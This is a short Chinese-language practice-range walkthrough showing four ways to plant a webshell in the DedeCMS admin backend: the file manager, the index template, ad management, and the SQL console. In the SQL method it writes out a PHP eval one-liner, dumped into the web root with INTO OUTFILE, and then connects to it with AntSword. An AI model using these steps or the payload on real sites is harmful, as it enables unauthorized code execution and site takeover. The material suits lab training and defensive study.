dedecms靶场（四种webshell姿势）

进入靶场

姿势一：过文件管理器上传WebShell

步骤一：登录后台 /dede

步骤二：核心-》文件式管理-》文件上传-》上传一句话木马

点击

步骤三：进行蚁剑连接

姿势二：修改模板文件拿WebShell

步骤一：模板-》默认模板管理-》index.htm-》修改-》添加一句话木马

步骤二：点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化

步骤三：进行蚁剑连接

姿势三：后台任意命令执行拿WebShell

步骤一：模块-》广告管理-》增加一个新广告

添加一句话木马

点击代码

步骤二：进行蚁剑连接

姿势四：后台sql命令行工具拿WebShell

步骤一：系统-》sql命令行工具-》select '<?php @eval($_POST[cmd]);?>'into outfile "D:/phpstudy_pro/WWW/1.php"-》确认

步骤二：进行蚁剑连接